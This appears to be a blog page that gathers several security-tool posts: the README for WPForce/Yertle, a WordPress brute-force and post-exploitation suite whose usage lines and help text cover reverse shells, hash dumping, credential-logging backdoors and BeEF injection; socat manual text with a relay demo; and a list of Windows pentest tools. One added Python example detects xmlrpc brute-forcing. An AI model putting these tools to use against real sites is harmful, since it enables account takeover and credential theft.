Showing posts with label Netcat. Show all posts

WPForce - Wordpress Attack Suite


WPForce is a suite of WordPress attack tools. It currently contains two scripts: WPForce, which brute-forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post-exploitation modules.


Features:
  • Brute force via the API rather than the login form, bypassing some forms of protection
  • Can automatically upload an interactive shell
  • Can be used to spawn a full featured reverse shell
  • Dumps WordPress password hashes
  • Can backdoor the authentication function for plaintext password collection
  • Inject BeEF hook into all pages
  • Pivot to meterpreter if needed

Install:
Yertle requires the requests library to run.
http://docs.python-requests.org/en/master/user/install/

Usage:
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

,-~~-.___. __ __ ____ _____
/ | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___
( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \.
\_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/
==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___|
/ \-'~; || |
/ __/~| ...||__/|-" Brute Force Attack Tool for Wordpress
=( _____||________| ~n00py~

Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
--------------------------
[xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials! - THIS ACCOUNT IS ADMIN
--------------------------
--------------------------
[xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials!
--------------------------
100% Percent Complete
All correct pairs:
{'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'}

-h, --help show this help message and exit
-i INPUT, --input INPUT
Input file name
-w WORDLIST, --wordlist WORDLIST
Wordlist file name
-u URL, --url URL URL of target
-v, --verbose Verbose output. Show the attempts as they happen.
-t THREADS, --threads THREADS
Determines the number of threads to be used, default is 10
-a AGENT, --agent AGENT
Determines the user-agent
-d, --debug This option is used for determining issues with the script.
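The feature list above points out that the brute force goes through the WordPress API rather than the login form, so login-form rate limiting never sees it. The following is an added detection example, not code from the WPForce project: it runs a sliding-window counter over constructed access-log lines and flags sources that hammer an authentication endpoint. It assumes the API calls land as POSTs to /xmlrpc.php (and also watches /wp-login.php); adjust AUTH_PATHS for your site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed combined-format access log (not taken from the post). The
# assumption: API-driven guessing shows up as a burst of POSTs to /xmlrpc.php
# from one source, while the login form itself stays quiet.
SAMPLE_LOG = """\
198.51.100.9 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.18.4"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.18.4"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.18.4"
203.0.113.7 - - [10/Oct/2023:13:55:42 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.18.4"
203.0.113.7 - - [10/Oct/2023:13:55:43 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.18.4"
198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:14:10:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.18.4"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Endpoints through which WordPress credentials are checked (assumed set).
AUTH_PATHS = {"/xmlrpc.php", "/wp-login.php"}

def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_bursts(log_text, threshold=5, window_s=60):
    """Return {ip: peak_count} for sources that POST to an auth endpoint at
    least `threshold` times inside any `window_s`-second sliding window."""
    recent = defaultdict(deque)      # ip -> timestamps of recent auth POSTs
    flagged = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] not in AUTH_PATHS:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:   # slide the window
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged
```

On the sample, only 203.0.113.7 is flagged (five API POSTs within four seconds); the single form login from the other address stays under the threshold, and the lone request twenty minutes later falls outside the window.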


python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
_..---.--. __ __ _ _
.'\ __|/O.__) \ \ / /__ _ __| |_| | ___
/__.' _/ .-'_\ \ V / _ \ '__| __| |/ _ \.
(____.'.-_\____) | | __/ | | |_| | __/
(_/ _)__(_ \_)\_ |_|\___|_| \__|_|\___|
(_..)--(.._)'--' ~n00py~
Post-exploitation Module for Wordpress

Backdoor uploaded!
Upload Directory: ebwhbas
os-shell>



-h, --help show this help message and exit
-i, --interactive Interactive command shell
-r, --reverse Reverse Shell
-t TARGET, --target TARGET
URL of target
-u USERNAME, --username USERNAME
Admin username
-p PASSWORD, --password PASSWORD
Admin password
-li IP, --ip IP Listener IP
-lp PORT, --port PORT
Listener Port
-v, --verbose Verbose output.
-e EXISTING, --existing EXISTING
Skips uploading a shell, and connects to existing shell

Yertle currently contains these modules:
Core Commands
=============

Command Description
------- -----------
? Help menu
beef Injects a BeEF hook into website
exit Terminate the session
hashdump Dumps all WordPress password hashes
help Help menu
keylogger Patches WordPress core to log plaintext credentials
keylog Displays keylog file
meterpreter Executes a PHP meterpreter stager to connect to metasploit
quit Terminate the session
shell Sends a TCP reverse shell to a netcat listener
stealth Hides Yertle from the plugins page


Socat - Multipurpose relay (SOcket CAT)

Socat is a utility similar to the venerable Netcat that works over a number of protocols and through files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP, TCP), and as a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.

Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes.

Filan is a utility that prints information about its active file descriptors to stdout. It has been written for debugging socat, but might be useful for other purposes too. Use the -h option to find more information.

Procan is a utility that prints information about process parameters to stdout. It has been written to better understand some UNIX process properties and for debugging socat, but might be useful for other purposes too.

The life cycle of a socat instance typically consists of four phases.

In the init phase, the command line options are parsed and logging is initialized.

During the open phase, socat opens the first address and afterwards the second address. These steps are usually blocking; thus, especially for complex address types like socks, connection requests or authentication dialogs must be completed before the next step is started.

In the transfer phase, socat watches both streams' read and write file descriptors via select(), and, when data is available on one side and can be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.

When one of the streams effectively reaches EOF, the closing phase begins. Socat transfers the EOF condition to the other stream, i.e. it tries to shut down only its write stream, giving it a chance to terminate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and terminates.
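To make the transfer and closing phases concrete, here is an added example, not part of socat or of this page: a small relay that watches two sockets with select(), forwards in both directions, passes EOF on as a half-close (shutdown of the write side only), and keeps the opposite direction open for a grace period in the spirit of the -t option before closing everything. demo() wires it up with socketpairs so it runs offline; the endpoints and messages are constructed.

```python
import select
import socket
import threading
import time

def relay(left, right, close_timeout=0.5, blocksize=8192):
    """Bidirectional relay modelled on socat's transfer and closing phases:
    select() on both sides, forward whatever is readable, on EOF half-close the
    peer's write side only, keep the other direction for close_timeout (-t)
    seconds, then close both. Returns (bytes left->right, bytes right->left)."""
    peers = {left: right, right: left}   # sides still delivering data
    forwarded = {left: 0, right: 0}      # bytes read from each side
    deadline = None                      # set when the first EOF arrives
    while peers:
        wait = None if deadline is None else max(0.0, deadline - time.monotonic())
        readable, _, _ = select.select(list(peers), [], [], wait)
        if not readable:                 # closing-phase timeout expired
            break
        for src in readable:
            dst = peers[src]
            data = src.recv(blocksize)
            if data:
                dst.sendall(data)
                forwarded[src] += len(data)
                continue
            # EOF on src: pass it on by shutting down only dst's write side
            try:
                dst.shutdown(socket.SHUT_WR)
            except OSError:
                pass
            del peers[src]
            if deadline is None:
                deadline = time.monotonic() + close_timeout
    left.close()
    right.close()
    return forwarded[left], forwarded[right]

def demo():
    """Constructed run on socketpairs: a_far <-> a ==relay== b <-> b_far."""
    a, a_far = socket.socketpair()
    b, b_far = socket.socketpair()
    result = []
    worker = threading.Thread(target=lambda: result.append(relay(a, b, 2.0)))
    worker.start()
    a_far.sendall(b"hello from left\n")
    got = b_far.recv(64)
    b_far.sendall(b"reply from right\n")
    got_back = a_far.recv(64)
    a_far.shutdown(socket.SHUT_WR)          # left side signals EOF
    eof = b_far.recv(64)                    # b"": right side sees the half-close
    b_far.sendall(b"late data\n")           # still relayed inside the -t window
    late = a_far.recv(64)
    b_far.close()                           # second EOF ends the session
    worker.join()
    a_far.close()
    return got, got_back, eof, late, result[0]
```

The returned counts show the asymmetry socat describes: after the left side's EOF, the right side's reply traffic is still carried until it too closes.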

OPTIONS

Socat provides some command line options that modify the behaviour of the program. They have nothing to do with the so-called address options that are used as parts of address specifications.

-V
Print version and available feature information to stdout, and exit.
-h | -?
Print a help text to stdout describing command line options and available address types, and exit.
-hh | -??
Like -h, plus a list of the short names of all available address options. Some options are platform dependent, so this output is helpful for checking the particular implementation.
-hhh | -???
Like -hh, plus a list of all available address option names.
-d
Without this option, only fatal and error messages are generated; applying this option also prints warning messages. See DIAGNOSTICS for more information.
-d -d
Prints fatal, error, warning, and notice messages.
-d -d -d
Prints fatal, error, warning, notice, and info messages.
-d -d -d -d
Prints fatal, error, warning, notice, info, and debug messages.
-D
Logs information about file descriptors before starting the transfer phase.
-ly[<facility>]
Writes messages to syslog instead of stderr; severity as defined with -d option. With optional <facility>, the syslog type can be selected, default is "daemon". Third party libraries might not obey this option.
-lf <logfile>
Writes messages to <logfile> [filename] instead of stderr. Some third party libraries, in particular libwrap, might not obey this option.
-ls
Writes messages to stderr (this is the default). Some third party libraries might not obey this option, in particular libwrap appears to only log to syslog.
-lp<progname>
Overrides the program name printed in error messages and used for constructing environment variable names.
-lu
Extends the timestamp of error messages to microsecond resolution. Does not work when logging to syslog.
-lm[<facility>]
Mixed log mode. During startup messages are printed to stderr; when socat starts the transfer phase loop or daemon mode (i.e. after opening all streams and before starting data transfer, or, with listening sockets with fork option, before the first accept call), it switches logging to syslog. With optional <facility>, the syslog type can be selected, default is "daemon".
-lh
Adds hostname to log messages. Uses the value from environment variable HOSTNAME or the value retrieved with uname() if HOSTNAME is not set.
-v
Writes the transferred data not only to their target streams, but also to stderr. The output format is text with some conversions for readability, and prefixed with "> " or "< " indicating flow directions.
-x
Writes the transferred data not only to their target streams, but also to stderr. The output format is hexadecimal, prefixed with "> " or "< " indicating flow directions. Can be combined with -v.
-b<size>
Sets the data transfer block <size> [size_t]. At most <size> bytes are transferred per step. Default is 8192 bytes.
-s
By default, socat terminates when an error occurs, to prevent the process from running when some option could not be applied. With this option, socat is sloppy with errors and tries to continue. Even with this option, socat will exit on fatals, and will abort connection attempts when security checks fail.
-t<timeout>
When one channel has reached EOF, the write part of the other channel is shut down. Then, socat waits <timeout> [timeval] seconds before terminating. Default is 0.5 seconds. This timeout only applies to addresses where write and read part can be closed independently. When during the timeout interval the read part gives EOF, socat terminates without awaiting the timeout.
-T<timeout>
Total inactivity timeout: when socat is already in the transfer loop and nothing has happened for <timeout> [timeval] seconds (no data arrived, no interrupt occurred...) then it terminates. Useful with protocols like UDP that cannot transfer EOF.
-u
Uses unidirectional mode. The first address is only used for reading, and the second address is only used for writing.
-U
Uses unidirectional mode in reverse direction. The first address is only used for writing, and the second address is only used for reading.
-g
During address option parsing, don't check if the option is considered useful in the given address environment. Use it if you want to force, e.g., application of a socket option to a serial device.
-L<lockfile>
If lockfile exists, exits with error. If lockfile does not exist, creates it and continues, unlinks lockfile on exit.
-W<lockfile>
If lockfile exists, waits until it disappears. When lockfile does not exist, creates it and continues, unlinks lockfile on exit.
-4
Use IP version 4 if the addresses do not implicitly or explicitly specify a version; this is the default.
-6
Use IP version 6 if the addresses do not implicitly or explicitly specify a version.


36 Windows Tools For Penetration Testing



Most penetration testers use either a Mac or a Linux-based platform to perform their penetration testing activities. However, it is always good practice to also have a Windows virtual machine with some tools ready to be used for the engagement. The reason is that although Windows cannot be used as a main platform for penetration testing, some of its utilities and tools can still help us extract information from our Windows targets. So in this post we will see some of the tools that we can use on our Windows system.

The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files).

Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Remote access software for desktop and mobile platforms.

SNMP tool that allows you to collect information about SNMP devices.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development.

PuTTY is an SSH and telnet client for the Windows platform.

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows logon sessions maintained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with their corresponding NTLM credentials (e.g. users remotely logged in through Remote Desktop/Terminal Services), and also to change at runtime the current username, domain name, and NTLM hashes.

Recovering Windows Password Cache Entries.

Identify unknown open ports and their associated applications.

This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares.

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed.

ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer.

SQLdict is a dictionary attack tool for SQL Server.

PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process.

GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attacker's computer, or redirect traffic between two other computers through the attacker's computer. In the latter case you need to enable IP forwarding, which can be done with GrabItAll too.

DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1.

BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading).

Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation).

Brute-force tool for Windows Management Instrumentation (WMI).

Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled.

The SMB Auditing Tool is a password auditing tool for the Windows and SMB platforms. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremely fast to guess passwords on these platforms.

RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.

LSASecretsDump is a small console application that extracts the LSA secrets from the Registry, decrypts them, and dumps them into the console window.

SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever.

The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.

Extract password hashes from local user accounts.

The PsTools package provides a set of command line utilities that allow you to manage local and remote systems.

Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators.

DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information.

X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc.

Windows password cracker.

Ophcrack is a free Windows password cracker based on rainbow tables.

SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations.
